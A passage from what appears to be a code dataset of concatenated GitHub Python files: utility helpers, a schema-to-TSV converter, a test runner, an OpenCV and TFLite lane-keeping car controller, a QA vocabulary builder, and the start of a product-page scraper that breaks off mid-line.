deliminator): return s.partition(deliminator)[2]\n\n\ndef substring_before(s, deliminator): return s.partition(deliminator)[0]\n\n\ndef get_config_var(field, holder, default_val=None):\n # return an item's value from a dictionary\n return holder[field] if field in holder else default_val\n\n\ndef max_found(events, field):\n max_num = 0\n for event in events:\n if event[field] > max_num:\n max_num = event[field]\n return max_num\n\n\ndef max_in_list_of_ioi(events, field):\n max_previously_seen = 0\n for ev in events:\n seen = 0\n for poi in ev['items_of_interest']:\n if poi['label'] == field:\n seen += 1\n if seen > max_previously_seen:\n max_previously_seen = seen\n return max_previously_seen\n\n\ndef max_found_list(events, field):\n max_num = 0\n for event in events:\n if len(event[field]) > max_num:\n max_num = len(event[field])\n return max_num\n\n\ndef max_sub_list(events, field, sub_field):\n max_num = 0\n for event in events:\n for f_item in event[field]:\n if f_item[sub_field] > max_num:\n max_num = f_item[sub_field]\n return max_num\n\n\ndef merge_dictionaries(source, destination):\n # \"\"\"\n # from: https://stackoverflow.com/questions/20656135/python-deep-merge-dictionary-data\n #\n # >>> a = { 'first' : { 'all_rows' : { 'pass' : 'dog', 'number' : '1' } } }\n # >>> b = { 'first' : { 'all_rows' : { 'fail' : 'cat', 'number' : '5' } } }\n # >>> merge(b, a) == { 'first' : { 'all_rows' : { 'pass' : 'dog', 'fail' : 'cat', 'number' : '5' } } }\n # True\n # \"\"\"\n for key, value in source.items():\n if isinstance(value, dict):\n # get node or create one\n node = destination.setdefault(key, {})\n merge_dictionaries(value, node)\n else:\n destination[key] = value\n\n return destination\n\n\ndef load_config_file_node(filename, node, default_val, log):\n _config_from_file = default_val\n if os.path.exists(filename):\n with open(filename, 'r') as conf_file:\n _yaml_contents = yaml.safe_load(conf_file)\n if node in _yaml_contents:\n _config_from_file = _yaml_contents[node]\n else:\n log('Error: \"{}}\" doesnt have \"{}}\" settings'.format(filename, node))\n else:\n log('Error: \"config_file\" set in apps.yaml config, but {} doesnt seem to exist'.format(filename))\n return _config_from_file\n\n\ndef clip(val, min_, max_):\n return min_ if val < min_ else max_ if val > max_ else val\n\n\ndef should_text_be_black_or_white(rgb):\n yiq = ((rgb[0]*299)+(rgb[1]*587)+(rgb[2]*114))/1000\n return 'black' if yiq >= 128 else 'white'\n\n\ndef field_1_or_2(arr, field_1, field_2, field_3=None, default=None):\n if field_1 in arr:\n return arr[field_1]\n if field_2 in arr:\n return arr[field_2]\n if field_3 and field_3 in arr:\n return arr[field_3]\n return default\n\n\ndef get_time_ranges(events, _dtg_format, minutes_padding=3):\n\n start = None\n end = None\n\n for ev in events:\n # Skip if no time information\n ev_start = date_time(field_1_or_2(ev, 'start', 'start_time', 'time'), _dtg_format)\n ev_end = date_time(field_1_or_2(ev, 'end', 'end_time', 'time'), _dtg_format)\n\n # Find the earliest and latest times\n if not start or ev_start < start:\n start = ev_start\n if ev_end and (not end or ev_end > end):\n end = ev_end\n\n if minutes_padding:\n start -= timedelta(minutes=minutes_padding)\n end += timedelta(minutes=minutes_padding)\n\n return start.strftime(_dtg_format), end.strftime(_dtg_format)\n\n\ndef build_icon_string(event):\n sorted_analysis = sorted(event.items_of_interest, key=itemgetter('importance'), reverse=True)\n out = \"\"\n for obj in sorted_analysis:\n title = obj['name'] if 'name' in obj else obj['label']\n if 'icon' in obj and obj['importance'] > 1:\n out += \"\".format(\n obj['icon'], obj['label'], title.title())\n return out\n\n\ndef date_time(dtg, _dtg_format):\n if type(dtg) == str:\n dtg = datetime.strptime(dtg, _dtg_format)\n return dtg\n\n\ndef center_of_rect(box, image=None):\n coord = [box['x_min'], box['y_min'], box['x_max'], box['y_max']]\n center = [coord[0] + (coord[2] / 2), coord[1] + (coord[3] / 2)]\n if image and image.image and image.image.height:\n center[0] = center[0] / image.image.width\n center[1] = center[1] / image.image.height\n return center \n\n\ndef point_in_polygon(polygon, point):\n \"\"\"\n From: https://www.algorithms-and-technologies.com/point_in_polygon/python\n\n Raycasting Algorithm to find out whether a point is in a given polygon.\n Performs the even-odd-rule Algorithm to find out whether a point is in a given polygon.\n This runs in O(n) where n is the number of edges of the polygon.\n *\n :param polygon: an array representation of the polygon where polygon[i][0] is the x Value of the i-th point and polygon[i][1] is the y Value.\n :param point: an array representation of the point where point[0] is its x Value and point[1] is its y Value\n :return: whether the point is in the polygon (not on the edge, just turn < into <= and > into >= for that)\n \"\"\"\n\n # A point is in a polygon if a line from the point to infinity crosses the polygon an odd number of times\n odd = False\n # For each edge (In this case for each point of the polygon and the previous one)\n i = 0\n j = len(polygon) - 1\n while i < len(polygon) - 1:\n i = i + 1\n # If a line from the point into infinity crosses this edge\n # One point needs to be above, one below our y coordinate\n # ... and the edge doesn't cross our Y corrdinate before our x coordinate (but between our x coordinate and infinity)\n\n if (((polygon[i][1] > point[1]) != (polygon[j][1] > point[1])) and (point[0] < (\n (polygon[j][0] - polygon[i][0]) * (point[1] - polygon[i][1]) / (polygon[j][1] - polygon[i][1])) +\n polygon[i][0])):\n # Invert odd\n odd = not odd\n j = i\n # If the number of crossings was odd, the point is in the polygon\n return odd\n","repo_name":"jaycrossler/watcher_appdaemon_plugin","sub_path":"string_helpers.py","file_name":"string_helpers.py","file_ext":"py","file_size_in_byte":8655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31257982853","text":"import json\nimport os\nimport yaml\nimport argparse\nfrom collections import OrderedDict\nfrom datetime import datetime\nimport pandas\n\n'''Be sure to update the doc strings, so they are coherent and helpful.'''\n\ndef setup():\n '''Performs all setup necessary to run convert_dictionary().'''\n parse_options()\n create_output_path()\n create_master_out()\n\ndef parse_options():\n '''Obtain path_to_schemas and name of output directory.'''\n global args\n\n parser = argparse.ArgumentParser(description=\"Obtain path_to_schemas and name of output directory.\")\n parser.add_argument(\"-p\", \"--path_to_schemas\", dest=\"path_to_schemas\", required=True, help=\"Path to input schemas, relative to directory dictionary_tools.\")\n parser.add_argument(\"-o\", \"--out_dir_name\", dest=\"out_dir_name\", required=False, help=\"Name of output directory.\")\n\n args = parser.parse_args()\n\n return args\n\ndef mkdir(directory):\n '''Create directory if it does not already exist.'''\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef create_output_path():\n '''Create path to the output directory: dictionary_tools/output/get_tsv/'''\n global out_path\n\n if args.out_dir_name:\n out_dir_name = args.out_dir_name\n else:\n out_dir_name = datetime.strftime(datetime.now(), 'output_tsv_%m.%d_%H.%M')\n\n out_path = '../../output/get_tsv/' + out_dir_name + '/'\n\n mkdir(out_path)\n\ndef create_master_out():\n global master_out\n master_out = {'nodes': [], 'variables': []}\n\ndef get_input_dict():\n '''Returns a list containing all the filenames from the input dictionary.'''\n global path_to_schemas\n\n # path from args, relative to dictionary_tools/\n # e.g., input/dictionaries/gdcdictionary/gdcdictionary/schemas/\n path_to_schemas = '../../' + args.path_to_schemas\n\n if path_to_schemas[-1] != '/':\n path_to_schemas += '/'\n\n input_dict = os.listdir(path_to_schemas)\n\n return input_dict\n\ndef get_schema(schema_file):\n '''Load and return contents of schema_file as dictionary.'''\n path = path_to_schemas + schema_file\n # 'input/dictionaries/gdcdictionary/gdcdictionary/schemas/' + 'sample.yaml'\n\n schema_dict = yaml.load(open(path))\n\n return schema_dict\n\ndef get_headers():\n '''Could create a config file.. for now just loading here.'''\n nodes_head = ['', '', '', '<category>', '<submittable>', '<description>', '<link_name>', '<backref>', '<label>', '<target>', '<multiplicity>', '<link_required>', '<link_group_required>', '<group_exclusive>']\n var_head = ['<node>', '<field_action>', '<field>', '<description>', '<type>', '<options_action>', '<options>', '<required>', '<term>']\n\n return nodes_head, var_head\n\ndef write_out():\n '''\n Eventually:\n out.to_csv(path_or_buf='test_out.tsv', sep='\\t', index=False, columns=head)\n\n where 'out' is a pandas DataFrame isomorphic to the desired output tsv\n '''\n nodes_out = pandas.DataFrame(master_out['nodes'])\n variables_out = pandas.DataFrame(master_out['variables'])\n\n # out_path = '../../output/get_tsv/' + out_dir_name + '/'\n # presently only creating the master nodes and var's TSV files\n # can create the pairs for individual nodes l8r\n\n mkdir(out_path)\n\n nodes_path = out_path + 'nodes.tsv'\n variables_path = out_path + 'variables.tsv'\n\n nodes_head, var_head = get_headers()\n\n nodes_out.to_csv(path_or_buf=nodes_path, sep='\\t', index=False, columns=nodes_head, encoding='utf-8')\n variables_out.to_csv(path_or_buf=variables_path, sep='\\t', index=False, columns=var_head, encoding='utf-8')\n\n# okay\ndef convert_dictionary():\n '''Creates a collection of nodes and variables TSV files corresponding to the input dictionary.'''\n schema_files = get_input_dict()\n\n # can put this elsewhere\n ignore_schemas = ['projects', 'README.md', '_definitions.yaml', '_settings.yaml', '_terms.yaml', '.DS_Store']\n\n for schema_file in sorted(schema_files):\n if schema_file not in ignore_schemas:\n convert_schema(schema_file)\n\n# incomplete subroutines\ndef convert_schema(schema_file):\n schema = get_schema(schema_file)\n\n # 'sample', 'case', etc.\n node = schema['id']\n\n # put variables rows in master_out\n get_variables(node, schema) # okay\n\n # put nodes row in master_out\n get_nodes(node, schema) # okay\n\ndef list_to_str(lst):\n '''If lst is a list, converts lst to the appropriate string respresentation of this list used in the TSV files.\n Else lst is returned untouched.\n '''\n if type(lst) is list:\n lst = str(lst)[1:-1].replace('\\'', '')\n\n return lst\n\ndef get_link_names(schema_dict):\n '''Return a list containing all the link names from the links section of the given schema dictionary.'''\n link_names = []\n\n try:\n links = schema_dict['links']\n for link in links:\n if 'subgroup' in link:\n group = link['subgroup']\n for item in group:\n link_names.append(item['name'])\n else:\n link_names.append(link['name'])\n\n except KeyError:\n print('no links for - ' + schema_dict['id'])\n\n return link_names\n\n# okay\ndef get_variables(node, schema):\n var_list = schema['properties']\n\n link_names = get_link_names(schema)\n req_vars = schema['required']\n\n for req_var in req_vars:\n if req_var not in var_list:\n handle_req_var(node, req_var)\n\n for var in sorted(var_list):\n if var not in link_names and var != '$ref':\n var_block = var_list[var]\n handle_var(node, var, var_block, req_vars)\n\ndef handle_req_var(node, req_var):\n # make this and other instances like it come from a template which is created once\n row = {'<node>': node,\n '<field_action>': None,\n '<field>': req_var,\n '<description>': None,\n '<type>': None,\n '<options>': None,\n '<options_action>': None,\n '<required>': 'True',\n '<term>': None\n }\n\n master_out['variables'].append(row)\n\n# okay - see notes here\ndef handle_var(node, var, var_block, req_vars):\n '''Construct dictionary (row) corresponding to this variable.'''\n\n # note: some properties only have $ref listed, for the whole block\n # these get their type listed as 'enum' presently, which is incorrect\n\n # presently ignoring <field_action> and <options_action> since these will be blank columns\n # definitely make this a template in another function or something\n row = {'<node>': node,\n '<field_action>': None,\n '<field>': var,\n '<description>': var_block.get('description'),\n '<type>': var_block.get('type', 'enum'), # some property type entries are lists - see acknowledgement.yaml#/properties/submitter_id\n '<options>': list_to_str(var_block.get('enum')), # not sure if this will work - will probably have to convert list into string list\n '<options_action>': None,\n '<required>': var in req_vars,\n '<term>': var_block.get('term', {'$ref': None})['$ref']\n }\n\n # remaining things to handle - probably <options>\n # maybe convert boolean <required> to yes/no? - hopefully not\n master_out['variables'].append(row)\n\n# okay - see janky subroutine\ndef get_nodes(node, schema):\n '''Construct dictionary (row) corresponding to this schema and its link section.'''\n\n row = {'<node>': node,\n '<node_action>': 'add', # only using this default value for now, for the demo - can remove later\n '<title>': schema['title'],\n '<category>': schema['category'],\n '<submittable>': schema['submittable'],\n '<description>': schema['description']\n }\n\n row.update(handle_links(row, schema))\n\n master_out['nodes'].append(row)\n\n# impressively janky, but should work\ndef handle_links(row, schema):\n '''Here we convert the links section from schema to spreadsheet format.'''\n try:\n links = schema['links']\n\n except KeyError:\n print('no links for - ' + schema_dict['id'])\n return {}\n\n out = {'<link_name>': [],\n '<backref>': [],\n '<label>': [],\n '<target>': [],\n '<multiplicity>': [],\n '<link_required>': [],\n '<link_group_required>': [],\n '<group_exclusive>': []}\n\n '''\n Notes\n Groups of properties:\n 1. <backref>\n 2. <link_group_required>, <group_exclusive>\n 3. the rest\n\n Definitely encapsulate these bigger code blocks.\n Maybe create a lookup table for headers <-> yaml keys\n '''\n\n for link in links:\n if 'subgroup' in link:\n\n # 1\n if out['<backref>'] == []:\n out['<backref>'].append(link['subgroup'][0]['backref'])\n\n # 2\n out['<link_group_required>'].append(link['required'])\n out['<group_exclusive>'].append(link['exclusive'])\n\n # 3\n sub_out = {'<link_name>': [],\n '<label>': [],\n '<target>': [],\n '<multiplicity>': [],\n '<link_required>': []\n }\n\n group = link['subgroup']\n\n for item in group:\n sub_out['<link_name>'].append(item['name'])\n sub_out['<label>'].append(item['label'])\n sub_out['<target>'].append(item['target_type'])\n sub_out['<multiplicity>'].append(item['multiplicity'])\n sub_out['<link_required>'].append(item['required'])\n\n # uh yeah fix this ^\n\n for key in sub_out:\n out[key].append(sub_out[key])\n\n else:\n # 1\n if out['<backref>'] == []:\n out['<backref>'].append(link['backref'])\n\n # 3 - notice identical block to above\n out['<link_name>'].append(link['name'])\n out['<label>'].append(link['label'])\n out['<target>'].append(link['target_type'])\n out['<multiplicity>'].append(link['multiplicity'])\n out['<link_required>'].append(link['required'])\n\n for key in out:\n out[key] = list_to_str(out[key])\n\n # print json.dumps(out, indent=2)\n\n return out\n\nif __name__ == \"__main__\":\n\n setup()\n convert_dictionary()\n write_out() # should I put this in convert_dictionary()? what difference does it make\n","repo_name":"uc-cdis/planx-bioinfo-tools","sub_path":"dictionary_tools/code/get_tsv/get_tsv.py","file_name":"get_tsv.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"29267089591","text":"import unittest\n\ntestmodules = []\ntests = ['project', 'programs']\nprefix = 'test_'\nsuffix = '.py'\n\nfor test in tests: testmodules.append(prefix+test)\n\nsuite = unittest.TestSuite()\n\nfor t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\ntest_runner = unittest.TextTestRunner().run(suite)","repo_name":"optimamodel/optima-tb","sub_path":"tests/run_alltests.py","file_name":"run_alltests.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"12732444991","text":"# %%\n# ref: User raja_961, “Autonomous Lane-Keeping Car Using Raspberry Pi and OpenCV”. Instructables. URL: https://www.instructables.com/Autonomous-Lane-Keeping-Car-U sing-Raspberry-Pi-and/\n\n# import necessay libraries\nimport time\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport tflite_runtime.interpreter as tflite\n\n\n# %%\n# incremental PID\nclass PidClass:\n p = 0\n i = 0\n d = 0\n\n error_last = 0\n error_last2 = 0\n\n def __init__(self, p, i, d):\n self.p = p\n self.i = i\n self.d = d\n\n def get(self, error):\n # p\n output = self.p * (error - self.error_last)\n # i\n output += self.i * error\n # d\n output += self.d * (error - 2*self.error_last + self.error_last2)\n self.error_last2 = self.error_last\n self.error_last = error\n return output\n\n# location PID\n\n\nclass PidClass2:\n p = 0\n i = 0\n d = 0\n\n error_i = 0\n error_last = 0\n\n def __init__(self, p, i, d):\n self.p = p\n self.i = i\n self.d = d\n\n def get(self, error):\n # p\n output = self.p * error\n # i\n self.error_i += error\n output += self.i * self.error_i\n # d\n output += self.d * (error - self.error_last)\n self.error_last = error\n return output\n\n# control speed\n\n\nclass Speed:\n\n target_speed = 0\n current_speed = 0\n current_count = 0\n current_output = 0\n # save the intermidiate value\n data = dict()\n\n def __init__(self, target_speed, p, i, d):\n self.target_speed = target_speed\n self.pid = PidClass(p, i, d)\n self.data[\"current_count\"] = []\n self.data[\"current_speed\"] = []\n self.data[\"current_output\"] = []\n self.data[\"time\"] = []\n\n # return the number of counts after last read\n def get_count(self):\n # get the count from the hello module\n with open('/sys/module/hello/parameters/count', 'r') as filetowrite:\n new_count = filetowrite.readline()\n # rm \"\\n\"\n new_count = new_count[:-1]\n # convert str to int\n new_count = int(new_count)\n # how many counts after last read\n count = new_count - self.current_count\n # save current value\n self.current_count = new_count\n return count\n\n # return the time interal between i'th and (i+1)'th encoder trigers\n def get_time(self, i):\n # parameter: x0 to x4\n with open('/sys/module/hello/parameters/x' + str(i), 'r') as filetowrite:\n time = filetowrite.readline()\n # rm \"\\n\"\n time = time[:-1]\n # convert str to int\n time = int(time)\n return time\n\n # return current speed\n def get_speed(self):\n # get nunber of counts after last read\n count = self.get_count()\n self.data[\"current_count\"].append(count)\n if count == 0:\n # no movement, return 0\n self.data[\"current_speed\"].append(0)\n return 0\n # we only have the last 5 time intervals\n count = min(count, 5)\n time_list = np.zeros(count)\n for i in range(count):\n # read the time interval\n time_list[i] = (self.get_time(i)+1)\n # average the time interval and calculate the time\n speed = 1000/np.average(time_list)\n self.data[\"current_speed\"].append(speed)\n return speed\n\n def init_pwm(self):\n # period: 20000000\n with open('/dev/bone/pwm/1/a/period', 'w') as filetowrite:\n filetowrite.write('20000000')\n # duty_cycle: 7.5%\n with open('/dev/bone/pwm/1/a/duty_cycle', 'w') as filetowrite:\n filetowrite.write('1500000')\n # enable\n with open('/dev/bone/pwm/1/a/enable', 'w') as filetowrite:\n filetowrite.write('1')\n\n def set_speed(self, value):\n # only allow the valur between 0 and 100\n value = max(0, min(100, value))\n self.current_output = value\n # convert output to pwm\n pwd = str(int(value * 4000 + 1500000))\n # set pwm\n with open('/dev/bone/pwm/1/a/duty_cycle', 'w') as filetowrite:\n filetowrite.write(pwd)\n return value\n\n def update(self):\n self.data[\"time\"].append(time.time())\n # get speed\n self.current_speed = self.get_speed()\n # get error\n speed_error = self.target_speed - self.current_speed\n # get the pid output\n speed_pid = self.pid.get(speed_error)\n # add the pid output to current speed output\n self.current_output += speed_pid\n # set speed output\n self.current_output = self.set_speed(self.current_output)\n self.data[\"current_output\"].append(self.current_output)\n\n\nclass Camera:\n # camera\n height = 240\n width = 320\n fps = 10\n # red paper\n red_threshold = 0.5 * height/2 * width\n # yolo\n model_size = 320\n model_path = \"/home/debian/elec533/best-fp16-3.tflite\"\n conf_threshold = 0.5\n iou_threshold = 0.45\n # save the intermidiate value\n data = dict()\n\n def __init__(self):\n # init camera\n self.cam = cv2.VideoCapture(2)\n self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)\n self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)\n self.cam.set(cv2.CAP_PROP_FPS, self.fps)\n # init data\n self.data[\"red_mask\"] = []\n self.data[\"k\"] = []\n self.data[\"time\"] = []\n self.data[\"frame\"] = []\n self.data[\"stop\"] = []\n # init model\n self.interpreter = tflite.Interpreter(\n model_path=self.model_path, num_threads=2)\n self.interpreter.allocate_tensors()\n self.output = self.interpreter.get_output_details()[0]\n self.input = self.interpreter.get_input_details()[0]\n\n def detect_stop(self, frame):\n # pre-process img\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (self.model_size, self.model_size))\n frame = frame.astype(np.float32)/255\n input_data = np.expand_dims(frame, axis=0)\n # process img\n self.interpreter.set_tensor(self.input['index'], input_data)\n self.interpreter.invoke()\n output_data = self.interpreter.get_tensor(self.output['index'])[0]\n # post-process img\n class_id = []\n boxes = []\n confs = []\n for i in range(output_data.shape[0]):\n confidence = output_data[i][4]\n # confidence threshold\n if confidence > self.conf_threshold:\n center_x = int(output_data[i][0] * self.width)\n center_y = int(output_data[i][1] * self.height)\n width = int(output_data[i][2] * self.width)\n height = int(output_data[i][3] * self.height)\n # convert box format for cv2.dnn.NMSBoxes\n left = center_x - width / 2\n top = center_y - height / 2\n class_id.append(0)\n confs.append(float(confidence))\n boxes.append([left, top, width, height])\n # NMS (not necessary)\n indices = cv2.dnn.NMSBoxes(\n boxes, confs, self.conf_threshold, self.iou_threshold)\n # self.display_box(boxes, confs, indices)\n # is there any stop sign\n for index in indices:\n i = index[0]\n box = boxes[i]\n return True\n return False\n\n def detect_red(self, hsv):\n # pink to red\n lower_red = np.array([140, 20, 40], dtype=\"uint8\")\n upper_red = np.array([200, 255, 255], dtype=\"uint8\")\n mask = cv2.inRange(hsv, lower_red, upper_red)\n # cv2.imshow(\"red\",mask)\n # get number of red\n count = mask.sum()/255\n self.data[\"red_mask\"].append(count)\n return (count > self.red_threshold)\n\n def detect_blue(self, hsv):\n # light blue to dark blue\n lower_blue = np.array([70, 90, 0], dtype=\"uint8\")\n upper_blue = np.array([150, 255, 255], dtype=\"uint8\")\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n # cv2.imshow(\"blue\",mask)\n return mask\n\n def display_box(self, boxes, confs, indices, line_color=(0, 255, 0), line_width=1):\n # background\n line_image = np.zeros([self.height, self.width, 3], np.uint8)\n\n for index in indices:\n i = index[0]\n left = int(boxes[i][0])\n top = int(boxes[i][1])\n width = int(boxes[i][2])\n height = int(boxes[i][3])\n # add box\n cv2.rectangle(line_image, (left, top), (left+width,\n top+height), line_color, line_width)\n # add confidence\n cv2.putText(line_image, str(\n confs[i]), (left, top+height), cv2.FONT_HERSHEY_SIMPLEX, 1, line_color, line_width)\n cv2.imshow(\"stop\", line_image)\n\n def display_lines(self, lines, line_color=(0, 255, 0), line_width=1):\n # background\n line_image = np.zeros([self.height, self.width, 3], np.uint8)\n\n for line in lines:\n for x1, y1, x2, y2 in line:\n # add line\n cv2.line(line_image, (x1, y1), (x2, y2),\n line_color, line_width)\n cv2.imshow(\"lines\", line_image)\n\n def detect_lines(self, mask):\n # detect edges\n edges = cv2.Canny(mask, 50, 100)\n # cv2.imshow(\"edges\",edges)\n rho = 1\n theta = np.pi / 180\n min_threshold = 40\n # get lines\n line_segments = cv2.HoughLinesP(edges, rho, theta, min_threshold,\n np.array([]), minLineLength=20, maxLineGap=20)\n if line_segments is None:\n # no line!\n return 0\n # self.display_lines(line_segments)\n left = []\n right = []\n for line in line_segments:\n # calculate the theta\n theta = math.atan((line[0][3]-line[0][1]) /\n (line[0][2]-line[0][0]+0.1))\n # we don't need horizontal lines\n if theta > 0.1:\n right.append(theta)\n elif theta < -0.1:\n left.append(theta)\n # average left\n left_theta = np.average(left) if left else 0\n # average right\n right_theta = np.average(right) if right else 0\n return (left_theta + right_theta)\n\n def update(self):\n # get image\n _, frame = self.cam.read()\n # save the image\n _, jpg = cv2.imencode(\".jpg\", frame)\n self.data[\"frame\"].append(jpg)\n # cv2.imshow(\"frame\",frame)\n self.data[\"time\"].append(time.time())\n # get the hsv of half image for red detection and line detection\n hsv = cv2.cvtColor(frame[int(self.height/2):, :, :], cv2.COLOR_BGR2HSV)\n # red detection\n red = self.detect_red(hsv)\n # blue detection\n blue_mask = self.detect_blue(hsv)\n # line detection\n theta = self.detect_lines(blue_mask)\n # stop sign detection\n stop = self.detect_stop(frame)\n return [red, stop, theta]\n\n def close(self):\n # close camera\n self.cam.release()\n # output the image files\n for i, jpg in enumerate(self.data[\"frame\"]):\n with open(str(i)+'.jpg', 'wb') as filetowrite:\n filetowrite.write(jpg.tobytes())\n\n\nclass Direction:\n\n target_direction = 0\n current_direction = 0\n current_output = 0\n # save the intermidiate value\n data = dict()\n\n def __init__(self, p, i, d):\n self.pid = PidClass2(p, i, d)\n self.data[\"current_direction\"] = []\n self.data[\"current_output\"] = []\n self.data[\"red\"] = []\n self.data[\"time\"] = []\n # init camera\n self.cam = Camera()\n\n def init_pwm(self):\n # period: 20000000\n with open('/dev/bone/pwm/1/b/period', 'w') as filetowrite:\n filetowrite.write('20000000')\n # duty_cycle: 7.5%\n with open('/dev/bone/pwm/1/b/duty_cycle', 'w') as filetowrite:\n filetowrite.write('1500000')\n # enable\n with open('/dev/bone/pwm/1/b/enable', 'w') as filetowrite:\n filetowrite.write('1')\n\n def set_direction(self, value):\n # value should be -100 t0 100\n value = max(-100, min(100, value))\n # convert value to pwm\n pwd = str(int(value * 3000 + 1500000))\n with open('/dev/bone/pwm/1/b/duty_cycle', 'w') as filetowrite:\n filetowrite.write(pwd)\n return value\n\n def update(self):\n # get results from camera\n red, stop, theta = self.cam.update()\n self.data[\"time\"].append(time.time())\n self.data[\"current_direction\"].append(theta)\n # get the pid output\n self.current_output = self.pid.get(theta)\n # set the pwm\n self.current_output = self.set_direction(self.current_output)\n self.data[\"current_output\"].append(self.current_output)\n return red, stop\n\n def close(self):\n self.cam.close()\n\n\n# %%\n# init speed with target speed 200, p 0.05, i 0.01, d 0.01\nspeed = Speed(200, 0.05, 0.01, 0.01)\n# init speed pwm\nspeed.init_pwm()\n# init direction with p 60, i 0, d 0\ndirection = Direction(60, 0, 0)\n# init direction pwm\ndirection.init_pwm()\n\n\n# %%\n# stop count how much loops the car should keep stop\nstop_count = 0\n# cooldown for red and stop signal\n# don't stop again immediately after a stop\nred_cooldown = 25\n# how many red paper the car stops\nred_count = 0\n# how many stop sign the car stops\nsign_count = 0\n# total time, about 45 secs\nrun_loop = 300\nfor _ in range(run_loop):\n # is the car required to stop\n if stop_count:\n # count--\n stop_count -= 1\n # stop\n speed.set_speed(0)\n else:\n # update the speed\n speed.update()\n # update the direction, and get the red and stop sign\n red, stop = direction.update()\n # don't stop again immediately after a stop\n if red_cooldown > 0:\n red_cooldown -= 1\n # if this is the fisrt red paper\n elif red and red_count == 0:\n # stop 10 loops\n stop_count = 10\n # set cooldown to 30\n red_cooldown = 25\n # add the red count\n red_count = 1\n # if this is the second red paper\n elif red and red_count == 1:\n # stop\n speed.set_speed(0)\n # We made it! break the loop.\n break\n # if there is a stop sign\n if red_cooldown == 0 and stop and sign_count == 0:\n # stop 10 loops\n stop_count = 10\n # set cooldown to 30\n red_cooldown = 25\n # add the red count\n sign_count = 1\n\n# stop forever\nspeed.set_speed(0)\n# go straight\ndirection.set_direction(0)\n","repo_name":"nicolechen63/elec533","sub_path":"let go.py","file_name":"let go.py","file_ext":"py","file_size_in_byte":14771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33503360826","text":"import json\n\nwith open(f'MSRVTT-QA/train_qa.json') as f:\n ds = json.load(f)\n\nfreq_dict = {}\nfor item in ds:\n answer = item['answer']\n if answer not in freq_dict:\n freq_dict[answer] = 0\n freq_dict[answer] += 1\n\nans_count = sorted([(k, v) for k, v in freq_dict.items()], key=lambda x: x[1], reverse=True)\n\ndic_size = 2000\nmin_count = min([x[1] for x in ans_count][:dic_size])\ncand_set = [x[0] for x in ans_count if x[1] >= min_count]\nprint(len(cand_set))\n\nwith open(f'MSRVTT-QA/vocab_2k.json', 'w') as f:\n json.dump(cand_set, f)\n\n","repo_name":"rowanz/merlot_reserve","sub_path":"demo/zero_shot_qa/build_vocab.py","file_name":"build_vocab.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"95"} +{"seq_id":"41713730401","text":"import threading\nimport logging\n\nfrom ..lib.Services import get_soup_from_url, clean_string\n\n\ndef split_status_amount(text):\n splitted_text = text.split(' - ')\n status = None\n amount = 0\n if len(splitted_text) > 1:\n status, n_vendidos = splitted_text\n # example: 9 Vendidos\n parsed_text = n_vendidos.split(' ')\n if len(parsed_text) == 2:\n amount = int(parsed_text[0])\n else:\n status = splitted_text[0]\n return (status, amount)\n\n\ndef parse_location(location_div):\n try:\n location = location_div.select(\".card-description\")[0]\n return location['title']\n except IndexError as err:\n logging.error(\"Error parsing location!\", err)\n return \"N/A\"\n\n\ndef parse_specs_list(specs_list):\n try:\n return [{'spec_name': spec.strong.contents[0], 'spec_value': spec.span.contents[0]} for spec in specs_list]\n except IndexError as err:\n logging.error(\"Error getting item specs\", specs_list)\n return []\n\n\ndef parse_description(description_ele):\n try:\n if len(description_ele) == 0:\n return \"\"\n contents = description_ele[0].p.contents\n clean_content = []\n for p in contents:\n # check if the variable is string, otherwise it could be a <br/> tag, just skip them\n is_str = isinstance(p, str)\n if is_str: clean_content.append(p)\n clean_content = \" | \".join(clean_content)\n return clean_string(clean_content)\n except IndexError as err:\n logging.error(\"Error parsing item description\", description_ele)\n return \"\"\n\n\n'''\nThe following conditions determines if an item is stored to ElasticSearch or not\nPrice < $25 & Sales > 25U\nPrice >= $25 & Sales > 50U \n'''\n\n\ndef is_product_interesting(price, sales):\n if (price < 25 and sales > 25) or (price >= 25 and sales > 50):\n return True\n else:\n return False\n\n\nclass ItemParser(threading.Thread):\n def __init__(self, q, result):\n threading.Thread.__init__(self)\n self.result = result\n self.q = q\n\n def run(self):\n while not self.q.empty():\n item_work = self.q.get() # fetch a new item from the queue\n full_item_info = {}\n try:\n logging.debug(\"Requested work... %i\" % item_work[0])\n item_soup = get_soup_from_url(item_work[1]['link'])\n # extract item info\n item_info = item_soup.select(\"#short-desc > div\")[0]\n item_name = item_info.select(\".item-title__primary\")[0].contents[0]\n # calculate item price\n item_price_fraction = clean_string(item_info.select(\".price-tag-fraction\")[0].contents[0])\n item_price_fraction = item_price_fraction.replace(\".\", \"\") # 2.000 is converted to 2000\n item_price_cents = item_info.select(\".price-tag-cents\")\n if len(item_price_cents) == 1: item_price_cents = clean_string(item_price_cents[0].contents[0])\n else: item_price_cents = '00'\n item_price = float(item_price_fraction + '.' + item_price_cents)\n\n item_status_amount = item_info.select(\".item-conditions\")[0].contents[0]\n item_status_amount = clean_string(item_status_amount)\n extra_data = split_status_amount(item_status_amount)\n\n # extract seller location\n seller_location = item_soup.select(\".seller-location\")\n location = \"N/A\"\n if len(seller_location) > 0:\n location = parse_location(seller_location[0])\n\n # extract item specs\n item_specs = item_soup.select(\".specs-item\")\n item_specs_list = parse_specs_list(item_specs)\n\n # extract item description\n item_description = item_soup.select(\".item-description__text\")\n item_description_text = parse_description(item_description)\n\n # extract id and metadata from item\n item_id = item_soup.select(\"#productInfo > input:nth-child(1)\")[0]['value']\n parent_url = item_soup.select(\"#productInfo > 